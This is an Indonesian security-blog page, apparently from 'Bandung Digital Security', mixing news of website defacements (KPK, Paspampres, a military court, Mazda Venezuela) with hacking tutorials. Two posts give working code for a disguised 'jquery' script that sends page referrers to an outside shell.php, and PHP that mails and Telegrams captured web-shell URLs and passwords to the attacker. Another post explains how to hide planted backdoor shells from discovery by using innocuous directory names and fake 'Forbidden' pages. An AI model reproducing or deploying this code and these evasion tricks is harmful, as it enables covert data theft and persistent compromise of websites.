Bandung Digital Security: Internet

Subdomain Situs Komisi Pemberantasan Korupsi (KPK) Diretas

Baru baru ini Subdomain dari Situs Komisi Pemberantasan Korupsi alias KPK lebih tepatnya pada Subdomain e-LHKPN KPK Diretas , Peretas tidak merusak tampilan halaman depan namun merusak index dari direktori penyimpanan gambar yaitu pada bagian /images yang beralamat pada : https://elhkpn.kpk.go.id/images/ , Saat dikunjungi Tampilan berubah menjadi Latar putih dan berisikan Sebuah Kata-kata dan sebuah gambar Kartun dimana tulisan tersebut bertuliskan :

"Hacked by MrMoonz"

[ Indonesian Hacker Rulez ]

Laughing at your security! Security is just an illusion!

Copyrights © Rabbit Security Team 2018

Entah apa motif dari kasus peretasan ini Belum jelas apakah administrator website yang menangani website tersebut telah mengetahui kejadian serangan cyber ini. Karena hingga sekarang, tampilan deface tersebut masih dapat ditemui.

Sampai dirunkan nya berita ini belum ada tanggapan dari pihak pengelola website, dan masih menyimpan file yang bernama owned.html , kita bisa melihat tampilan nya di archive berikut :
https://defacer.id/archive/mirror/2586126

atau bisa langsung melihat di alamat :

https://elhkpn.kpk.go.id/images/

(Zaenal Arifin)

Situs Paspampres Kembali Diretas

Dan Terjadi lagi Website resmi Pasukan Pengamanan Presiden alias Paspampres tampaknya sedang diusili hacker. ketika pihak kami membuka sebuah file yang bernama owned.html tampak tampilan Hitam dengan Logo Devilz Street dan bertuliskan "Owned by Typical Idiot Security"

Belum jelas apakah administrator website Paspampres yang menangani website tersebut telah mengetahui kejadian serangan cyber ini. Karena hingga sekarang, tampilan deface tersebut masih dapat ditemui.

Belum diketahui pula siapakah hacker di balik serangan model deface ini. Domain mil.id sendiri sengaja dibuat PANDI (Pengelola Nama Domain Internet Indonesia) untuk kebutuhan militer.

Kejadian ini pernah terjadi pada Sabtu, 02 Mei 2015 dan kali ini pada tanggal 21 Agustus 2018 Website Resmi Paspampres kembali menjadi target para hacker.

Sampai dirunkan nya berita ini belum ada tanggapan dari pihak pengelola website, dan masih menyimpan file yang bernama owned.html , kita bisa melihat tampilan nya di archive berikut :
http://www.zone-h.org/mirror/id/31589934

atau bisa langsung melihat di alamat :

https://www.paspampres.mil.id/owned.html

(Zaenal Arifin)

Update Free WordPress Hosting 2018

Oke Kembali lagi bersama saya , Kali ini saya akan memberi kabar gembira bagi para gretongers alias pecinta Gratisan yaps kali ini mengenai Hosting webserver :V

Kali ini Rumahweb menyediakan Hosting WordPress Secara Gratis berikut spesifikasinya :

menggabungkan performa Litespeed Webserver yang tak terbantahkan dengan kemudahan pengelolaan WordPress dari Plesk Panel.
LiteSpeed WebServer untuk akses website secepat kilat
WordPress Toolkit untuk kemudahan mengelola WordPress
Plesk Panel yang kaya fitur
Unlimited Traffic
Free SSL
Cloud Based Infrastructure yang reliable

Wow cukup menggiurkan bukan untuk para gretongers , yok buruan jangan sampai telat karena promo ini berbatas waktu.

Kalian bisa Registrasi disini , so tunggu apa lagi ?

Semoga bermanfaat bagi para gretongers ;) selamat beraktifitas kembali
Terimakasih telah berkunjung di website kami pantau terus situs kami untuk update hal-hal menakjubkan lainnya :p

(Zaenal Arifin)

Peretas Menggunakan Server Google Untuk Menyelenggarakan Malware Secara Gratis

Di masa lalu, para peneliti keamanan telah menemukan kasus di mana hacker yang terkenal mampu menggunakan data gambar EXIF untuk menyembunyikan kode berbahaya. Teknik ini masih banyak digunakan untuk menginfeksi pengguna web dengan malware.

Selangkah lebih maju, telah ditemukan bahwa peretas telah menemukan cara untuk berbagi malware melalui server Google tepercaya dan tepercaya seperti milik googleusercontent. Bertentangan dengan malware yang disimpan dalam file teks, jauh lebih sulit untuk melihat muatan berbahaya dalam gambar. Selain itu, semakin sulit melaporkan malware yang ditemukan di googleusercontent.com ke Google.

Bagi mereka yang tidak tahu, googleusercontent adalah domain Google untuk melayani konten yang disediakan pengguna tanpa memengaruhi keamanan laman Google sendiri.

Sesuai laporan Sucuri, kode berikut terlihat dalam skrip yang mengekstrak kode keamanan PayPal:

Skrip membaca data EXIF dari gambar googleusercontent, yang mungkin diunggah oleh seseorang di akun Google+ atau Blogger. Ketika bagian UserComment dari data EXIF-nya didekodekan, ternyata itu adalah skrip yang memiliki kemampuan untuk mengunggah file web shell dan arbitrary.

Ini menggaris bawahi ancaman yang lebih besar karena tidak ada cara untuk mendeteksi malware sampai seseorang memeriksa meta data gambar dan menguraikannya. Bahkan setelah menemukan malware, seseorang tidak dapat mengetahui sumber sebenarnya dari gambar tersebut.

Tutorial Memasang Keylogger di JavaScript

Oke sebelumnya saya sudah menjelaskan tentang Keylogger di Java Script kali ini saya akan memberikan tutorial cara memasangnya.

Jika belum tahu kalian bisa Baca disini : Java Script Keylogger

langsung saja pertama kita buat file jquery nya terlebih dahulu
dengan code :

var r=document.referrer;if(r != ""){var x = new XMLHttpRequest();x.open("GET", "https://labs.suicide-db.com/shell.php?ref=" + r, true);xhttp.send();}

sedikit penjelasan :
https://labs.suicide-db.com/shell.php : ini merupakan web kalian yang berisikan shell yang berisi keylogger.

jika sudah save dengan format .js jika sudah kalian bisa membuat script ini :

<script type="text/javascript" src="https://labs.suicide-db.com/jquery.js"></script>

Letakan script ini didalam meta <head> </head> Contoh :

<head><script type="text/javascript" src="https://labs.suicide-db.com/jquery.js"></script></head>

jika sudah kita ke tahap selanjutnya kita kembali ke step atas di bagian pada link https://labs.suicide-db.com/shell.php nah sekarang kita akan membuat file shell.php ini

pertama kalian masuk filemanager website kalian dan buat sebuah file shell.php atau bebas disini saya membuat file shell.php jika sudah masukan script berikut :

<?php@date_default_timezone_set('Asia/Jakarta');error_reporting(0);error_log(0); if(isset($_GET['ref'])){$url = $_GET['ref'];if(!empty($url)){$sb = "[SHELL][Xenzia Worm][".date('D, d M Y H:i:s')."]";$headers = "From: PROLOGGER <KeyLogger@xenzia.worm>\r\n";$msg = "+------------------------------------------+\n# SHELL LOG ".date('D,d m Y H:i:s')."\n+------------------------------------------+\n# URL :: ".$url."\n+------------------------------------------+\n# JavCode @ 2018 | Powered by : shutdown57\n+------------------------------------------+\n";@mail("postmaster@zaenalarifin.net",$sb,$msg,$headers);@file_get_contents('https://api.telegram.org/bot516764791:AAEEnO8F…/sendMessage…);$fp = fopen('sl/JavCode-'.date('dmY').'.txt','a');fwrite($fp,$msg);fclose($fp);}exit;}else{exit('?');}

Oke hal yang harus diperhatikan :
@mail("postmaster@zaenalarifin.net",$sb,$msg,$headers); (log dari shell ini akan masuk ke alamat email kalian)

@file_get_contents('https://api.telegram.org/bot516764791:AAEEnO8F…/sendMessage…);

(log dari shell akan masuk ke alamat pesan telegram kalian)

jika sudah save file nya dan keylogger sudah terbuat
Oke mudah bukan , mungkin cukup sekian semoga bermanfaat

Jika masih tidak mengerti kalian bisa hubungi saya di Menu Contact Us

(Zaenal Arifin)

JavaScript Keylogger

Oke Kembali lagi bersama saya kali ini saya akan share tutorial membuat/membongkar key logger di Java Script tepatnya di Jquery buatan Shutdown57 dari JavaCode.

Pada umumnya keylogger dibuat dalam bentuk code PHP namun teknik tersebut sudah diketahui banyak orang dan memunculkan sebuah inspirasi baru dari Shutdown57 untuk tetap menjalankan Keylogger tanpa diketahui yaitu menggunakan ref dari Jquery
Kok bisa dari script jquery ?

yaps disini kita memfungsikan request ajax yang ambil referrer dari shell.
Berikut Code Singkat Jquery nya :

var xhttp = new XMLHttpRequest();xhttp.open("GET", "http://x.linuxcode.org/_.php?ref=" + document.referrer, true);xhttp.send();

Yaps disini kita bisa melihat request dari referrer menuju sebuah link yaitu http://x.linuxcode.org/_.php

nah disinilah letak keylogger nya , dalam intinya keylogger ini sama menggunakan code php namun disini author membuat agar tidak diketahui orang melainkan melalui request referrer dari link lain menggunakan fungsi request dari jquery yang akan diarahkan menuju http:/x.linuxcode.org/_.php agar tidak dapat diketahui orang dan orang akan mengira file jquery ini merupakan fungsi yang seperti biasanya dalam arti (bukan sebuah file berbahaya/hanya untuk memfungsikan style dalam web itu sendiri)

Oke tahap selanjut nya , apa isi dari http:/x.linuxcode.org/_.php ?

yaps jika kita buka maka link tersebut blank atau tidak ada isinya mengapa ? karena ini hanya berisikan code php keylogger tanpa ulasan sedikitpun , oke lalu isi code nya apa ?

Isi dalam file _.php itu code php keylogger

berikut Code nya seperti ini :

<?php@date_default_timezone_set('Asia/Jakarta');error_reporting(0);error_log(0);
if(isset($_GET['ref'])){$url = $_GET['ref'];if(!empty($url)){$sb = "[SHELL][shutdown57][".date('D, d M Y H:i:s')."]";$headers = "From: PROLOGGER <LoggerShell@shutdown57.today>\r\n";$msg = "+------------------------------------------+\n# SHELL LOG ".date('D,d m Y H:i:s')."\n+------------------------------------------+\n# URL :: ".$url."\n+------------------------------------------+\n# JavCode @ 2018 | Powered by : shutdown57\n+------------------------------------------+\n";@mail("indonesianpeople.shutdown57@gmail.com",$sb,$msg,$headers);@file_get_contents('https://api.telegram.org/bot516764791:AAEEnO8F…/sendMessage…);$fp = fopen('sl/JavCode-'.date('dmY').'.txt','a');fwrite($fp,$msg);fclose($fp);}exit;}else{exit('?');}

Yaps itu merupakan isi dari file _.php didalam script keylogger diatas memakai 3 fungsi logger yang akan dikirimkan ke :

Kedalam Server
Kedalam Email @mail()
Kedalam Telegram dengan menggunakan Api Telegram message

Jadi keylogger disini mengmbil dari referrer shell yg berada di http:/x.linuxcode.org/_.php
terus bagaimana jika shell menggunakan Password ?

Kalian bisa pasang :

echo "<meta http-equiv=refresh content=0;url=?login=".$this->password.">";

untuk ambil variabel password nya

Untuk Cara pemasangan Keylogger Kalian Bisa Baca disini :
Cara Memasang Kylogger di Java Script

Oke mungkin cukup sekian dan terimakasih semoga bermanfaat

Selamat Beraktifitas kembali

(Zaenal Arifin)

Trik Agar Shell Backdoor Tidak Diketahui Orang bahkan [Google Dorking]

Oke gengs ketemu lagi sama saya Zaenal yang gans tiada tara , kali ini saya akan share trik agar shell backdoor kalian tidak terkena dorking orang

Oke jadi gini ,Jadi kesimpulan nya sangat simple ..

Pada dasarnya ketika orang dorking shell menggunakan google dork yang cukup relevan

Ex : inurl:/wp-content/plugins/name/shell.php

yaps /shell.php ini yang sangat fatal karena di web ada meta tag , otomatis shell/seluruh file yg sudah masuk di web akan terindex di google

otomatis masuk cache google
Example :

jadi ketika kita membuat shell di dir yg kita buat

Ex : /Haxor dan upload file index.php << index.php berisikan source code shell kalian

jadi ketika kita buka dir nya bisa tanpa extentsi .php karena

Kemungkinan besar tidak akan diketahui orang lain walaupun terindex google karena kebanyakan jika nama shell kalian aneh" itu jadi pertimbangan para pencuri shell mungkin mereka fikir itu peluang besar untuk mencuri

dan jangan kalian membuat nama dir yg identik dengan Hacker / Sejenisnya kalian bisa membuat dir dengan nama default dir cms , plugins atau sejenisnya

Ex : /javascript - /css - /filemanager - /tinymce

dan jika orang lain membuka dir /javascript otomatis mereka berfikir bahwa ini bukan merupakan sebuah shell

dan hal paling penting set shell background dengan menu tampilan forbidden biar lebih meyakinkan karena bisa jadi mereka mengira bahwa dir tersebut di setting forbidden oleh admin dari web tersebut

mungkin trik shell forbidden sudah diketahui tetapi para anak" gblk cukup pintar dan melihat file name nya tidak langsung di close

dan nama shell ini juga yg menjadi perhatian karena si anak" gblk pinter mana mungkin admin membuat nama file yg aneh contoh :

Ex : /wp-content/plugins/sayang.php

Nah mungkin begitu lah teknik nya

dan jangan lupa

Jangan pernah kalian menggunakan <title>Shell bekdor apalah</title> cukup gunakan title Forbidden biar orang lain yakin , dikarenakan jika title shell kalian

Ex : <title>Mini Shell</title>

Otomatis Anak" kntl lebih mudah untuk mencari karena ketika mereka membaca nama shell sudah pasti niat gblk nya dan mencoba untuk menuju link yg muncul dan efek yg terjadi shell kalian akan hilang begitu saja

Berikut Sebuah contoh shell yg terkena dorking dan pasti di klik oleh orang lain :

Semoga bermanfaat

(Zaenal Arifin)

Official Website Madza Venezuela Diretas

SUICIDE-DB - Thursday, 12-07-2018. The new site Madza Mobile Venezuela hacked by Indonesian Hackers , those who call themselves Typical Idiot Security back in action, this time the official website of Madza Mobile Venezuela became the target, this hacker managed to exploit the official website Madza Venezuela located at http://mazda.com.ve/free.html, this hacker does not change the look of the front page but instead entrust a file called free.html
which contains the message :

hacked by typical idiot security <3

free prosox

whatever the motive of this attack but in the message can be concluded that they are friends or what I do not know, da in the message convey the message "free Prosox", yes who does not know the name of Prosox, he is a hacker from francis attack the popular site youtube month then

Here's how websites look after hacked:

Mazda Motor Corporation (マツダ株式会社 Matsuda Kabushiki-gaisha) (TYO: 7261) is a Japanese automotive company. The company was founded in 1920 and headquartered in Hiroshima, Japan. The company employs 39,364 workers on March 31, 2008. In 2007, Mazda produced 1.3 million cars worldwide. Much of that production (nearly 1 million) is produced at its plant in Japan, with the remainder at other plants around the world.

Until this news is revealed there has been no improvement from related sites. But the site is already being forwarded for archives or alerts that the site has been hacked.

You can see the Archive Mirror database of hackers at :
http://www.zone-h.org/mirror/id/31455443

(Zaenal Arifin)

Situs Pengadilan Militer Makasar Diretas

Bandung Digital Security - Selasa , 08-05-2018. Baru-baru ini situs Pengadilan Militer Makasar dijahili Hacker, Lagi-lagi situs pemerintah Indonesia menjadi Target para Hacker , Kali ini Hacker Bangladesh yang bercode nama Ghost@Terminal Dari Team_CC ini berhasil meng exploitasi situs pengadilan militer makasar yang beralamat di http://www.dilmil-makassar.go.id/ , hacker ini merubah tampilan halaman depan menjadi background hitam diiringi lantunan lagu underground dan bertuliskan :

Ghost@Terminal

This website is haunted!

SECURITY BREACH!

The file you are looking for is not where you think it is."

Haunted by TeaM_CC!

Sekilas Tampilan :

Situs Pengadilan Militer ini merupakan pengadilan yang bertugas untuk memeriksa dan memutus pada tingkat pertama perkara pidana dan sengketa Tata Usaha Militer sebagaimana ditentukan dalam pasal 40 Undang-Undang RI Nomor 31 Tahun 1997 yakni prajurit yang berpangkat Kapten ke bawah.

Yaps siapa yang tidak kenal dengan nama TeaM_CC , team ini merupakan Attacker dari bangladesh yang sangat mengerikan dimana pada bulan-bulan kemarin Team ini berhasil meng exploitasi 2000 website dalam jangka waktu 2 hari. Namun dengan adanya kasus peretasan ini harusnya menjadi perhatian serius bagi pengelola website yang bersangkutan karena mungkin saja selanjutnya akan ada kasus peretasan lain.

Sampai berita ini diturunkan belum ada perbaikan dari situs terkait. Namun situs tersebut sudah dimirrorkan untuk arsip atau tanda bahwa situs tersebut telah diretas.

Kalian bisa melihat Archive Mirror database para hacker di :
http://zone-h.org/mirror/id/31165789

(Zaenal Arifin)

Bandung Digital Security

Labels

Technology